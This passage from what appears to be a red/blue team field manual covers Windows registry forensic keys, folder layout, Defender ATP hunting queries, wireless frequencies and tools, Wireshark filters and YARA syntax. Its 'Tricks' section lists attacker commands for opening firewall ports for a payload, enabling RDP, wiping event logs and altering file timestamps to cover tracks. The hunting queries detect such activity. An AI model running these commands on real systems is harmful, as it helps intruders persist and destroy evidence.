WindowsWinlogonShell NT\CurrentVersion\Winlogon
HKEY_LOCAL_MACHINE\Software\M
WindowsWinlogonShell icrosoft\Windows
(GINA DLL) NT\CurrentVersion\Winlogon
HKEY_USERS\%SID%\Software\Mic
WindowsWinlogonShell rosoft\Windows
(GINA DLL) NT\CurrentVersion\Winlogon
HKLM\SOFTWARE\Microsoft\Windo
wsNT\CurrentVersion\Winlogon\
Winlogon Userinit 7 Userinit
HKEY_LOCAL_MACHINE\Software\M
icrosoft\Windows
Winlogon Userinit NT\CurrentVersion\Winlogon
HKEY_USERS\%SID%\Software\Mic
rosoft\Windows
Winlogon Userinit NT\CurrentVersion\Winlogon
[Link]\Software\WinRAR\Di
WinRAR alog EditHistory\ArcName
[Link]\Software\WinRAR\ D
WinRAR ialogEditHistory\ExtrPath
WinRAR Extracted [Link]\Software\WinRAR\ A
Files MRU rcHistory
WinZip 11.1 Accessed [Link]\Software\Nico Mak
Archives 7 Computing\filemenu/filemenu##
WinZip 11.1 [Link]\Software\Nico Mak
Extraction MRU 7 Computing\Extract/extract#
WinZip 11.1 [Link]\Software\Nico Mak
Registered User 7 Computing\WinIni/Name 1
[Link]\Software\Nico Mak
WinZip 11.1 Temp File 7 Computing\Directories/ZipTemp
[Link]\Software\Nico Mak
WinZip Accessed Computing\filemenu /
Archives filemenu##
[Link]\Software\Nico Mak
WinZip Extraction MRU Computing\ Extract / extract#
[Link]\Software\Nico Mak
WinZip Location Computing\ Directories /
Extracted To ExtractTo
WinZip Registered [Link]\Software\Nico Mak
User Computing\ WinIni / Name 1
[Link]\Software\Nico Mak
Computing\ Directories /
WinZip Temp File ZipTemp

413
 [Link]\Software\Nico Mak
WinZip Zip Creation Computing\ Directories /
Location AddDir
[Link]\Software\Nico Mak
WinZip Zip Creation Computing\ Directories /
Location DefDir
[Link]\Software\Microsoft
Wireless associations 1 \ Windows\CurrentVersion\Inte
to SSIDs by user 7 8 0 rnet Settings\Wpad\
SOFTWARE\Microsoft\Windows
Wireless Connections 1 NT\ CurrentVersion\ NetworkLi
Post XP 7 8 0 st\Profiles\
SOFTWARE\Microsoft\Windows
NT\ CurrentVersion\ NetworkLi
1 st\ Signatures\Managed(or
Wireless Post XP 7 8 0 Unmanaged)\
SOFTWARE\Microsoft\WZCSVC\ Pa
rameters\Interfaces\{0E271E68
X -9033- 4A25-9883-
Wireless XP P A020B191B3C1} /Static#####
SOFTWARE\Microsoft\EAPOL\ Par
ameters\Interfaces\{0E271E68-
X 9033- 4A25-9883-A020B191B3C1}
Wireless XP P / #
[Link]\Software\Microsoft
X 1 \ Windows\CurrentVersion\Appl
WordPad MRU P 7 8 0 ets\ Wordpad\Recent File List
WPD Bus Enum 1 SYSTEM\ControlSet001\Enum\ SW
Enumeration 8 0 D\WPDBUSENUM
WPD Bus Enum Root
Enumeration User Mode 1 SYSTEM\ControlSet001\Enum\ Wp
Bus Drive Enumeration 7 8 0 dBusEnumRoot\UMB\
SYSTEM\ControlSet001\ Control
1 \DeviceClasses\{6ac27878-
WPD Device Interface 7 8 0 a6fa-4155-ba85-f98f491d4f33}
Write Block USB SYSTEM\ControlSet###\Control\
Devices 7 storageDevicePolicies\
SYSTEM\ControlSet###\Control\
Write Block USB X StorageDevicePolicies /
Devices P 7 8 WriteProtect
XP Search Assistant X [Link]\Software\Microsoft
history P \Search Assistant\ACMru\####
[Link]\Software\Yahoo\Pag
Yahoo Chat Rooms er\ profiles\\Chat
[Link]\Software\Yahoo\Pag
Yahoo! er\ Profiles\*
[Link]\Software\Yahoo\Pag
Yahoo! File Transfers er\ File Transfer

414
 [Link]\Software\Yahoo\Pag
er\ profiles\screen name
Yahoo! File Transfers \ FileTransfer
[Link]\Software\Yahoo\Pag
er\ profiles\screen name /
All Identities, Selected
Yahoo! Identities Identities
[Link]\Software\Yahoo\ Pa
Yahoo! Last User ger - Yahoo! User ID
[Link]\Software\Yahoo\Pag
Yahoo! Message er\ profiles\screen
Archiving name\Archive
[Link]\Software\Yahoo\ Pa
Yahoo! Password ger - EOptions string
[Link]\Software\Yahoo\Pag
Yahoo! Recent er\ profiles\screen
Contacts name\IMVironments\ Recent
[Link]\Software\Yahoo\ Pa
Yahoo! Saved Password ger - Save Password
[Link]\Software\Yahoo\Pag
Yahoo! Screen Names er\ profiles\screen name
[Link]\Software\Yahoo\Yse
Yserver rver

REFERENCE:
[Link]
[Link]
[Link]
58b7e00011f6947/1565096688890/Windows+Registry+Auditing+Cheat+Sheet+ver+Aug
+[Link]

W W
WINDOWS_Structure
ALL INFORMATIONAL WINDOWS
Windows top-level default file structure and locations in C:\.

DIRECTORY DESCRIPTION
Windows performance logs, but on a
\PerfLogs
default configuration, it is empty.
32-bit architecture: Programs 16-bit
and 32-bit installed in this folder.
\Program Files
64-bit architecture: 64-bit programs
installed in this folder.
Appears on 64-bit editions of Windows.
\Program Files (x86) 32-bit and 16-bit programs are by
default installed in this folder.
Contains program data that are expected
\ProgramData
to be accessed by applications system

415
 wide. The organization of the files is
at the discretion of the developer.
Folder contains one subfolder for each
user that has logged onto the system at
least once. In addition: "Public" and
\Users
"Default" (hidden),"Default User" (NTFS
"Default" folder) and "All Users" (NTFS
symbolic link to "C:\ProgramData").
Folder serves as a buffer for users of
a computer to share files. By default,
this folder is accessible to all users
that can log on to the computer. By
\Users\Public
default, this folder is shared over the
network with a valid user account. This
folder contains user created data
(typically empty).
This folder stores per-user application
data and settings. The folder contains
three subfolders: Roaming, Local, and
LocalLow. Roaming data saved in Roaming
%USER%\AppData
will synchronize with roaming profiles
to other computer when the user logs
in. Local and LocalLow does not sync up
with networked computers.
Windows itself is installed into this
\Windows
folder.
\Windows\System Folders store DLL files that implement
\Windows\System32 the core features of Windows. Any time
a program asks Windows to load a DLL
file and do not specify a path, these
folders are searched after program's
own folder is searched. "System" stores
16-bit DLLs and is normally empty on
\Windows\SysWOW64 64-bit editions of Windows. "System32"
stores either 32-bit or 64-bit DLL
files, depending on whether the Windows
edition is 32-bit or 64-bit. "SysWOW64"
only appears on 64-bit editions of
Windows and stores 32-bit DLLs.
This folder is officially called
"Windows component store" and
constitutes the majority of Windows. A
copy of all Windows components, as well
as all Windows updates and service
packs is stored in this folder.
\WinSxS
Starting with Windows 7 and Windows
Server 2008 R2, Windows automatically
scavenges this folder to keep its size
in check. For security reasons and to
avoid the DLL issues, Windows enforces
very stringent requirements on files.

416
W W
WINDOWS_Tricks
RED/BLUE TEAM MISC WINDOWS

Allow payload traffic through firewall:

netsh firewall add allowedprogram C:\[Link] MyPayload ENABLE

Open port on firewall:

netsh firewall add portopening TCP 1234 MyPayload ENABLE ALL

Delete open port on firewall:

netsh firewall delete portopening TCP 1234

Enable Remote Desktop

reg add
“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f

NTFS Enable Last Time File Accessed reg key as 0.

reg add "HKLM\SYSTEM\CurrentControlSet\Control\FileSystem" /v
NtfsDisableLastAccessUpdate /d 0 /t REG_DWORD /f

POWERSHELL REVERSE TCP SHELL

[Link]

WINDOWS COVER TRACKS

Delete all log files from WINDIR directory:
del %WINDIR%\*.log /a /s /q /f

Delete all System log files:

for /f %a in ('wevtutil el') do @wevtutil cl "%a"

Delete specific System log files:

#1 List System log file
wevtutil el
#2 Delete specific System log
wevtutil cl [LOGNAME]
wevtutil el | Foreach-Object {wevtutil cl "$_"}

PowerShell Change Timestamp of directory

417
PS> (Get-Item "C:\Windows\system32\MyDir").CreationTime=("01 March
2019 [Link]")

PowerShell Changing Modification time of a file

PS> (Get-Item
"C:\ Windows\system32\MyDir\[Link]").LastWriteTime=("01 March
2019 [Link]")

PowerShell Changing Access time of a file

PS> (Get-Item "C:\ Windows\system32\MyDir\[Link]
").LastAccessTime=("01 March 2019 [Link]")

PowerShell Change all Creation times of files in current directory

$files = Get-ChildItem -force | Where-Object {! $_.PSIsContainer}
foreach($object in $files)
{
$[Link]=("01 March 2019 [Link]")
}

W W
WINDOWS_Versions
ALL INFORMATIONAL WINDOWS

VERSION DATE RELEASE LATEST

Windows 10 15-Jul-15 NT 10.0 18362 1903
Windows 8.1 27-Aug-13 NT 6.3 9600
Windows 8 01-Aug-12 NT 6.2 9200
Windows 7 22-Jul-09 NT 6.1 7601
Windows Vista 08-Nov-06 NT 6.0 6002
Windows XP Pro 25-Apr-05 NT 5.2 3790
Windows XP 24-Aug-01 NT 5.1 2600
Windows Me 19-Jun-00 4.9 3000
Windows 2000 15-Dec-99 NT 5.0 2195
Windows 98 15-May-98 4.1 2222 A
Windows NT 4.0 31-Jul-96 NT 4.0 1381
Windows 95 15-Aug-95 4 950
Windows NT 3.51 30-May-95 NT 3.51 1057
Windows NT 3.5 21-Sep-94 NT 3.5 807
Windows 3.2 22-Nov-93 3.2 153
Windows 3.11 08-Nov-93 3.11 300
Windows NT 3.1 27-Jul-93 NT 3.1 528
Windows 3.1 06-Apr-92 3.1 103
Windows 3.0 22-May-90 3 N/A
Windows 2.11 13-Mar-89 2.11 N/A
Windows 2.10 27-May-88 2.1 N/A
Windows 2.03 09-Dec-87 2.03 N/A

418
 Windows 1.04 10-Apr-87 1.04 N/A
Windows 1.03 21-Aug-86 1.03 N/A
Windows 1.02 14-May-86 1.02 N/A
Windows 1.0 20-Nov-85 1.01 N/A

REFERENCE:
[Link]

W W
WINDOWS DEFENDER ATP
BLUE TEAM THREAT HUNT WINDOWS
Microsoft Defender Advanced Threat Protection is a platform
designed to help enterprise networks prevent, detect, investigate,
and respond to advanced threats.

DESCRIPTION QUERY
ProcessCreationEvents | where EventTime >
ago(10d)
| where (ProcessCommandLine contains ":3389" or
ProcessCommandLine contains ":6511")
| project EventTime, ComputerName, AccountName,
InitiatingProcessFileName, ActionType,
Possible RDP FileName, ProcessCommandLine,
tunnel InitiatingProcessCommandLine
ProcessCreationEvents
| where EventTime > ago(7d)
| where ( ProcessCommandLine contains "SC
CONFIG" and ProcessCommandLine contains
"DISABLED" and ProcessCommandLine contains
"wuauserv" )
or (ProcessCommandLine contains "Terminal
Serve" and ProcessCommandLine contains
"fDenyTSConnections" and ProcessCommandLine
contains "0x0" )
| summarize makeset(ComputerName),
makeset(AccountName),
makeset(ProcessCommandLine) by
InitiatingProcessFileName
| project EventTime, ComputerName,
Allow RDP ProcessCommandLine, InitiatingProcessFileName,
connection AccountName
ProcessCreationEvents
| where EventTime > ago(17d)
| where ProcessCommandLine contains "echo" and
ProcessCommandLine contains ".inf"
inf file echo | summarize makeset(ComputerName),
creation/execut makeset(AccountName),
ion makeset(ProcessCommandLine) by

419
 InitiatingProcessFileName
| project EventTime, ComputerName,
ProcessCommandLine, InitiatingProcessFileName,
AccountName
ProcessCreationEvents
| where EventTime > ago(7d)
| where ProcessCommandLine contains "net user"
and ProcessCommandLine contains "/add"
| summarize makeset(ComputerName),
makeset(AccountName),
makeset(ProcessCommandLine) by
InitiatingProcessFileName
| project EventTime, ComputerName,
Accounts ProcessCommandLine, InitiatingProcessFileName,
Creation AccountName
ProcessCreationEvents
| where EventTime > ago(7d)
| where ProcessCommandLine contains
"Administrator /active:yes" or
ProcessCommandLine contains "guest /active:yes"
| summarize makeset(ComputerName),
makeset(AccountName),
makeset(ProcessCommandLine) by
InitiatingProcessFileName
| project EventTime, ComputerName,
Local Accounts ProcessCommandLine, InitiatingProcessFileName,
Activation AccountName
ProcessCreationEvents
| where EventTime > ago(7d)
| where ProcessCommandLine contains
"localgroup" and ProcessCommandLine contains
"/add" and ( ProcessCommandLine contains
"Remote Desktop Users" or ProcessCommandLine
contains "administrators")
| summarize makeset(ComputerName),
makeset(AccountName),
makeset(ProcessCommandLine) by
InitiatingProcessFileName
| project EventTime, ComputerName,
User Addition ProcessCommandLine, InitiatingProcessFileName,
to Local Groups AccountName
ProcessCreationEvents
| where EventTime > ago(7d)
| where FileName contains "SECEDIT"
| where ProcessCommandLine == @"[Link]
/export /cfg ** .inf"
| summarize makeset(ComputerName),
makeset(AccountName),
Service makeset(ProcessCommandLine) by
Creation InitiatingProcessFileName

420
 AlertEvents
| where EventTime > ago(7d)
| summarize makeset(FileName),
dcount(FileName), makeset(ComputerName),
makeset(Category), dcount(ComputerName) by
Title
Alert Events | sort by dcount_ComputerName desc
AlertEvents
| where EventTime > ago(7d)
| summarize dcount(ComputerName),
dcount(FileName), makeset(FileName),
Alert Events by makeset(ComputerName) by Category, Severity
Category | sort by dcount_ComputerName desc
AlertEvents
| where EventTime > ago(7d)
| summarize dcount(Category), dcount(FileName),
makeset(Category), makeset(FileName) by
Alert Events by ComputerName, Severity
ComputerName | sort by dcount_Category desc
AlertEvents
| where EventTime > ago(7d)
| summarize dcount(ComputerName),
dcount(Category), makeset(Severity),
makeset(Category), makeset(ComputerName) by
Alert Events by FileName
FileName | sort by dcount_ComputerName desc
MiscEvents
| where EventTime > ago(17d)
| where ActionType == "WDAVDetection"
| summarize makeset(FileName),
makeset(InitiatingProcessParentFileName),
makeset(InitiatingProcessFileName),
makeset(InitiatingProcessCommandLine),
makeset(FolderPath),
Alert Events by makeset(InitiatingProcessFolderPath) ,
Win Defender makeset(AccountName ) by ComputerName
ProcessCreationEvents
| where EventTime > ago(10d)
| where ProcessCommandLine contains "call
ClearEventlog" or InitiatingProcessCommandLine
contains "call ClearEventlog"
| summarize makeset(ComputerName),
makeset(AccountName), dcount(ComputerName) by
Clearing Event InitiatingProcessFileName, ProcessCommandLine
Log Activity | sort by dcount_ComputerName desc
ProcessCreationEvents
| where EventTime > ago(10d)
Output | where ProcessCommandLine contains "2>&1"
Redirection | summarize makeset(ComputerName),
Activity makeset(AccountName), dcount(ComputerName) by

421
 InitiatingProcessFileName, ProcessCommandLine
| sort by dcount_ComputerName desc
ProcessCreationEvents
| where EventTime > ago(7d)
| where ProcessCommandLine contains "[Link]"
Remote Share | where ProcessCommandLine contains "\\c$" or
Mounting ProcessCommandLine contains "\\admin$" or
Activity ProcessCommandLine contains "\\ipc$"
ProcessCreationEvents
| where EventTime > ago(10d)
| where ProcessCommandLine contains
"[Link]\\ADMIN$\\" and ProcessCommandLine
contains "2>&1"
| project EventTime ,
InitiatingProcessFileName , ProcessCommandLine,
AccountName , ComputerName
IMPACKET | sort by InitiatingProcessFileName desc
Artifact Search | top 1000 by EventTime
ProcessCreationEvents
| where EventTime > ago(10d)
| where (ProcessCommandLine contains "-
accepteula" and ProcessCommandLine contains
"1>") or (ProcessCommandLine contains "-
accepteula" and ProcessCommandLine contains "-
ma")
| summarize makeset(ComputerName),
makeset(AccountName), dcount(ComputerName) by
Process Dump InitiatingProcessFileName, ProcessCommandLine
Activity | sort by dcount_ComputerName desc
NetworkCommunicationEvents
| where EventTime > ago(7d)
| where InitiatingProcessFileName in
("[Link]", "[Link]")
| summarize
makeset(InitiatingProcessParentName),
makeset(RemoteUrl), makeset(RemotePort),
Network makeset(InitiatingProcessAccountName) ,dcount(
Activity thru RemoteUrl) by InitiatingProcessCommandLine
Cscript/Wscript | sort by dcount_RemoteUrl desc
NetworkCommunicationEvents
| where EventTime > ago(1d)
| where InitiatingProcessFileName =~
"[Link]"
| summarize makeset(RemoteUrl),
makeset(RemotePort),
Network makeset(InitiatingProcessAccountName) ,dcount(
Activity thru RemoteUrl) by InitiatingProcessCommandLine
PowerShell | sort by dcount_RemoteUrl desc
ProcessCreationEvents
BitsAdmin | where EventTime > ago(7d)
Execution | where FileName contains "[Link]"

422
 | where ProcessCommandLine contains "/TRANSFER"
or ProcessCommandLine contains "/CREATE" or
ProcessCommandLine contains "/ADDFILE"
or ProcessCommandLine contains "/SETPROXY" or
ProcessCommandLine contains "/SETNOTIFYCMDLINE"
or ProcessCommandLine contains
"/SETCUSTOMHEADERS"
or ProcessCommandLine contains
"/SETSECURITYFLAGS" or ProcessCommandLine
contains "/SETREPLYFILENAME"
| project EventTime, ComputerName,
ProcessCommandLine, InitiatingProcessFileName,
AccountName
| top 1000 by EventTime
ProcessCreationEvents
| where EventTime > ago(7d)
| where FileName =~ "[Link]"
| where ProcessCommandLine contains "/transfer"
| project EventTime, ComputerName,
ProcessCommandLine, InitiatingProcessFileName,
BitsAdmin AccountName
Transfer | top 1000 by EventTime
ProcessCreationEvents
| where EventTime > ago(7d)
| where FileName =~ "[Link]"
| where ProcessCommandLine contains "-decode"
and ProcessCommandLine contains "\\AppData\\"
| project EventTime, ComputerName,
ProcessCommandLine, InitiatingProcessFileName,
LOLbin CertUtil AccountName
Decode | top 1000 by EventTime
ProcessCreationEvents
| where EventTime > ago(1d)
| where InitiatingProcessParentName contains
"[Link]" or InitiatingProcessParentName
contains "[Link]" or
InitiatingProcessParentName contains
"[Link]"
| where FileName contains "cscript" or FileName
contains "wscript" or FileName contains
"powershell"
| project EventTime, ComputerName,
ProcessCommandLine, InitiatingProcessFileName,
MSOffice Abuse InitiatingProcessParentName, AccountName
Indicators | top 1000 by EventTime
ProcessCreationEvents
| where EventTime > ago(7d)
| where FileName =~ "[Link]"
| where ProcessCommandLine contains
LOLbin RunDll32 ",Control_RunDLL"
Activity | summarize makeset(ComputerName),

423
 makeset(AccountName), dcount(ComputerName) by
InitiatingProcessFileName, ProcessCommandLine
| sort by dcount_ComputerName desc
ProcessCreationEvents
| where EventTime > ago(7d)
| where FileName =~ "[Link]"
| where ProcessCommandLine contains
"DllRegisterServer"
| summarize makeset(ComputerName),
makeset(AccountName) by
LOLbin RunDll32 InitiatingProcessFileName, ProcessCommandLine
Register Server | sort by InitiatingProcessFileName asc
ProcessCreationEvents
| where EventTime > ago(7d)
| where FileName =~ "[Link]"
| where InitiatingProcessFileName in
("[Link]" , "[Link]" , "[Link]" ,
"[Link]" , "[Link]" )
| summarize makeset(ComputerName),
LOLbin RunDll32 makeset(AccountName) by
Suspicious InitiatingProcessFileName, ProcessCommandLine
Execution | sort by InitiatingProcessFileName asc
ProcessCreationEvents
| where EventTime > ago(1d)
| where FileName =~ "[Link]"
| where ProcessCommandLine contains
"mshtml,RunHTMLApplication"
| project EventTime, ComputerName,
ProcessCommandLine, InitiatingProcessFileName,
LOLbin RunDll32 AccountName
HTA Remote | top 1000 by EventTime
ProcessCreationEvents
| where EventTime > ago(7d)
| where FileName =~ "[Link]"
| where ProcessCommandLine contains
"\\roaming\\"
| where ProcessCommandLine !contains "\\STREAM
Interactive (Emirates).appref-ms|"
| summarize makeset(ComputerName),
makeset(AccountName) by
LOLbin RunDll32 InitiatingProcessFileName, ProcessCommandLine
Roaming Profile | sort by InitiatingProcessFileName asc
ProcessCreationEvents
| where EventTime > ago(7d)
| where FileName =~ "[Link]"
| project EventTime, ComputerName,
ProcessCommandLine, InitiatingProcessFileName,
[Link] Process AccountName
Execution | top 1000 by EventTime
WMIC Process ProcessCreationEvents
call | where EventTime > ago(7d)

424
 | where FileName =~ "[Link]"
| where ProcessCommandLine contains "process
call create"
| project EventTime, ComputerName,
ProcessCommandLine, InitiatingProcessFileName,
AccountName
| top 1000 by EventTime
ProcessCreationEvents
| where EventTime > ago(7d)
| where FileName =~ "[Link]"
| where ProcessCommandLine contains ".js"
| summarize makeset(ComputerName),
makeset(AccountName) by
Process wscript InitiatingProcessFileName, ProcessCommandLine
to .js | sort by InitiatingProcessFileName asc
ProcessCreationEvents
| where EventTime > ago(7d)
| where FileName =~ "[Link]"
| where ProcessCommandLine contains
"\\appdata\\" and ProcessCommandLine contains
".zip" or ProcessCommandLine contains
"\\Rar$*\\"
| project EventTime, ComputerName,
Process wscript ProcessCommandLine, InitiatingProcessFileName,
creating .zip/. AccountName
rar | top 1000 by EventTime

Uncoder: One common language for cyber security

[Link]
[Link] is the online translator for SIEM saved searches,
filters, queries, API requests, correlation and Sigma rules to help
SOC Analysts, Threat Hunters and SIEM Engineers. Easy, fast and
private UI you can translate the queries from one tool to another
without a need to access to SIEM environment and in a matter of
just few seconds.
[Link] supports rules based on Sigma, ArcSight, Azure Sentinel,
Elasticsearch, Graylog, Kibana, LogPoint, QRadar, Qualys, RSA
NetWitness, Regex Grep, Splunk, Sumo Logic, Windows Defender ATP,
Windows PowerShell, X-Pack Watcher.

REFERENCE:
[Link]
Hunting/tree/master/WindowsDefenderATP%20Hunting%20Queries%20
[Link]

W W
WIRELESS FREQUENCIES
ALL INFORMATIONAL N/A

425
STANDARD FREQUENCIES
2.4, 3.6, 4.9, 5.0, 5.2, 5.6, 5.8,
802.11 5.9 and 60 GHz
802.11a 5.0 GHz
802.11b/g 2.4 GHz
802.11n 2.4, 5.0 GHz
Bluetooth/BLE 2.4-2.483.5 GHz
450, 850, 900 MHz 1.7, 1.8, 1.9,
CDMA2000 (inc. EV-DO, 1xRTT) and 2.1 GHz
850 MHz, 900 MHz, 1.8 GHz, and
EDGE/GPRS 1.9 GHz
EnOcean 868.3 MHz
Flash-OFDM 450 and 870 MHz
iBurst 1.8, 1.9, and 2.1 GHz
ISM Band 4.33GHz, 915MHz, 2.4GHz, 5GHz
Keyless FOB 315 MHz (US) 433.92 MHz (EU,Asia)
868 MHz (EU), 915 MHz (US),
Low Rate WPAN (802.15.4) 2.4 GHz
RFID 120-150 kHz (LF) 13.56 MHz (HF)
850 MHz, 900 MHz, 2.0, 1.9/2.1,
UMTS FDD 2.1, and 1.7/2.1 GHz
450, 850 MHz, 1.9, 2, 2.5, and
UMTS-TDD 3.5 GHz
Vemesh 868 MHz, 915 MHz, and 953 MHz
WiMax (802.16e) 2.3, 2.5, 3.5, 3.7, and 5.8 GHz
Wireless USB, UWB 3.1 to 10.6 GHz
AT&T 4G [2, 4, 5, 12, 14,
17, 29, 30, 66] 1900MHz, 1700MHz abcde, 700MHz bc
Verizon Wireless 4G [2, 4,
5, 13, 66] 1900MHz, 1700MHZ f, 700MHz c
T-Mobile 4G [2, 4, 5, 12, 1900MHz, 1700MHz def, 700MHz a,
66, 71] 600MHz
Sprint 4G [25, 26, 41] 1900MHz g, 850MHz, 2500MHz
Europe 4G [3, 7, 20] 1800MHz, 2600MHz, 800MHz
China,India 4G [40, 41] 2300MHz, 2500MHz
Longwave AM Radio 148.5 kHz – 283.5 kHz
Mediumwave AM Radio 525 kHz – 1710 kHz
Shortwave AM Radio 3 MHz – 30 MHz
HF 0.003 - 0.03 GHz
VHF 0.03 - 0.3 GHz
UHF 0.3 - 1 GHz
L 1 - 2 GHz
S 2 - 4 GHz
C 4 - 8 GHz
X 8 - 12 GHz
Ku 12 - 18 GHz
K 18 - 27 GHz
Ka 27 - 40 GHz
V 40 - 75 GHz

426
 W 75 - 110 GHz
mm or G 110 - 300 GHz

REFERENCE
[Link]
[Link]

WIRELESS_Tools
BETTERCAP
[Link]
bettercap is a powerful, easily extensible and portable framework
written in Go which aims to offer to security researchers, red
teamers and reverse engineers an easy to use, all-in-one solution
with all the features they might possibly need for performing
reconnaissance and attacking WiFi networks, Bluetooth Low Energy
devices, wireless HID devices and Ethernet networks.

KISMET
[Link]
Kismet is a wireless network and device detector, sniffer,
wardriving tool, and WIDS (wireless intrusion detection) framework.
Kismet works with Wi-Fi interfaces, Bluetooth interfaces, some SDR
(software defined radio) hardware like the RTLSDR, and other
specialized capture hardware.

PWNAGOTCHI
[Link]
Pwnagotchi is an A2C-based “AI” powered by bettercap and running on
a Raspberry Pi Zero W that learns from its surrounding WiFi
environment in order to maximize the crackable WPA key material it
captures (either through passive sniffing or by performing
deauthentication and association attacks). This material is
collected on disk as PCAP files containing any form of handshake
supported by hashcat, including full and half WPA handshakes as
well as PMKIDs.

AIRCRACK-NG
[Link]
Aircrack-ng is a complete suite of tools to assess WiFi network
security. It focuses on different areas of WiFi security:
Monitoring: Packet capture and export of data to text files for
further processing by third party tools
Attacking: Replay attacks, deauthentication, fake access points and
others via packet injection
Testing: Checking WiFi cards and driver capabilities (capture and
injection)
Cracking: WEP and WPA PSK (WPA 1 and 2)

WIFI-ARSENAL - GitHub Everything Wireless

427
[Link]

NEW TO SDR (Software Defined Radio)

[Link]

W W
WIRESHARK
RED/BLUE TEAM NETWORK TRAFFIC WINDOWS/LINUX/MacOS
Wireshark is an open-source network protocol analysis software
program.

FILTER DESCRIPTION
Filters out arp, icmp, stp
protocols to reduce background
!(arp or icmp or stp) noise
Captures all IPv6 traffic within
the local network that is
dst host ff02::1 multicast
[Link] Filter MAC Address
[Link] Filter MAC Address
offset filter for HEX values of
0x01 and 0x80 at the offset
eth[0x47:2] == 01:80 location of 0x47
Captures only traffic to or from
the MAC address
used. Capitalizing hexadecimal
letters does not matter.
Example: ether host
ether host ##:##:##:##:##:## [Link]
displays all packets that
frame contains traffic contain the word ‘traffic’.
Capture only traffic to or from
a specific IP address. Example:
host #.#.#.# host [Link]
host [Link] and not Capture all traffic, exclude
(port xx or port yy) specific packets.
Filter to HTTP Basic
[Link] Authentication
[Link] Filter to HTTP Cookies
[Link] Filter to HTTP data packets
[Link] Filter to HTTP Referer headers
Sets a filter for all HTTP GET
[Link] and POST requests.
[Link] Filter to HTTP Server
Filter to HTTP User Agent
http.user_agent strings
http.www_authentication Filter to HTTP authentication

428
ip Captures only IPv4 traffic
Capture only IPv6 over IPv4
ip proto 41 Tunnelled Traffic.
Shows packets to and from any
[Link] == [Link]/24 address in the [Link]/24 space
Sets a filter for any packet
with [Link], as either the src
[Link] == [Link] or dest
sets a conversation filter
[Link]==[Link] && between the two defined IP
[Link]==[Link] addresses
[Link] Filter IP to destination
[Link] Filter IP to source
ip6 Capures only IPv6 traffic
Capture IPv6 Native Traffic
Only. This will exclude
ip6 and not ip proto 41 tunnelled IPv6.
Capture traffic to or from
(sources or destinations) a
net #.#.#.#/24 range of IP addresses
not broadcast and not
multicast Capture only Unicast traffic.
Captures only a particular src
port ## or dst port
port sip Captures all SIP traffic (VoIP)
pppoes Capture PPPOE traffic
tcp Captures only TCP traffic
searches TCP packets for that
tcp contains xxx string
Capture traffic within a range
tcp portrange 1800-1880 of ports
displays all retransmissions,
[Link] duplicate acks, zero windows,
&& ![Link].window_update and more in the trace
[Link] Filter Port to TCP destination
displays all TCP SYN/ACK packets
& shows the connections that had
a positive response. Related to
[Link] == 0x012 this is [Link]==1
sets a filter for any TCP packet
[Link]==4000 with 4000 as src or dest
[Link] Filter port to TCP source
sets a filter to display all tcp
packets that have a delta time
tcp.time_delta > .250 of greater than 250ms
[Link] Filter Port to UDP destination
[Link] Filter Port to UDP source
vlan Captures only VLAN traffic.
Filter to 802.11 Management
[Link] eq 0 Frame

429
 [Link] eq 1 Filter to 802.11 Control Frame
[Link].type_subtype eq 0 Filter to 802.11 Association
(1=response) Requests
[Link].type_subtype eq 11 Filter to 802.11 Authentication
(12=authenticate) Requests
[Link].type_subtype eq 2 Filter to 802.11 Reassociation
(3=response) Requests
[Link].type_subtype eq 4
(5=response) Filter to 802.11 Probe Requests
[Link].type_subtype eq 8 Filter to 802.11 Beacons

REFERENCE:
[Link]
[Link]
[Link]
[Link]
wireshark-filters-2

Y
Y Y
YARA
ALL DISCOVERY N/A
YARA is an open source tool aimed at helping researchers to
identify and classify malware samples. YARA you can create
descriptions of malware families based on textual or binary
patterns. Descriptions consist of a set of strings and a Boolean
expression which determine its logic.

META

430
Metadata section input additional information about your rule with
user created assigned values.

STRINGS
Three types of strings in YARA:
1- hexadecimal
-wild-cards Ex. { E2 34 ?? C8 A? FB }
-jumps Ex. { F4 23 [4-6] 62 B4 }
-alternatives Ex. { F4 23 ( 62 B4 | 56 ) 45 }
2- text
-case-sensitive Ex. "text"
-case-insensitive Ex. "text" nocase
-wide-character Ex. "text" wide
-full words Ex. "text" fullword
3- regular expressions
\ Quote the next metacharacter
^ Match the beginning of the file
$ Match the end of the file
| Alternation
() Grouping
[] Bracketed character class

Quantifiers:
* Match 0 or more times
+ Match 1 or more times
? Match 0 or 1 times
{n} Match exactly n times
{n,} Match at least n times
{,m} Match 0 to m times
{n,m} Match n to m times
*? Match 0 or more times, non-greedy
+? Match 1 or more times, non-greedy
?? Match 0 or 1 times, non-greedy
{n}? Match exactly n times, non-greedy
{n,}? Match at least n times, non-greedy
{,m}? Match 0 to m times, non-greedy
{n,m}? Match n to m times, non-greedy
Escape seq:
\t Tab (HT, TAB)
\n New line (LF, NL)
\r Return (CR)
\n New line (LF, NL)
\f Form feed (FF)
\a Alarm bell
Character whose ordinal number is the given
\xNN hexadecimal number
Char classes:
\w Match a word character (aphanumeric plus “_”)
\W Match a non-word character

431
 \s Match a whitespace character
\S Match a non-whitespace character
\d Match a decimal digit character
\D Match a non-digit character
Zero-with
assertions:
\b Match a word boundary
\B Match except at a word boundary

CONDITION
Conditions are Boolean expressions to be met.
+ boolean (and, or, not)
+ relational operators (>=, <=, <, >, ==, !=)
+ arithmetic operators (+, -, *, \, %)
+ bitwise operators (&, |, <<, >>, ~, ^)

Example YARA Rule:

rule ExampleRule
{
meta:
author = "netmux"
description = "Detects Emotet binary"
license = "Free as in beer"
strings:
$ex_text_string = "text string" nocase
$ex_hex_string = { E2 34 A1 C8 23 FB }

condition:
$ex_text_string or $ex_hex_string
}

YARA SIGNATURE CREATION MINDMAP:

@cyb3rops **[Link]

432
Uncoder: One common language for cyber security
[Link]
[Link] is the online translator for SIEM saved searches,
filters, queries, API requests, correlation and Sigma rules to help
SOC Analysts, Threat Hunters and SIEM Engineers. Easy, fast and
private UI you can translate the queries from one tool to another
without a need to access to SIEM environment and in a matter of
just few seconds.
[Link] supports rules based on Sigma, ArcSight, Azure Sentinel,
Elasticsearch, Graylog, Kibana, LogPoint, QRadar, Qualys, RSA
NetWitness, Regex Grep, Splunk, Sumo Logic, Windows Defender ATP,
Windows PowerShell, X-Pack Watcher.

REFERENCE:
[Link]
[Link]

433
 NOTES

434
NOTES

435
 NOTES

436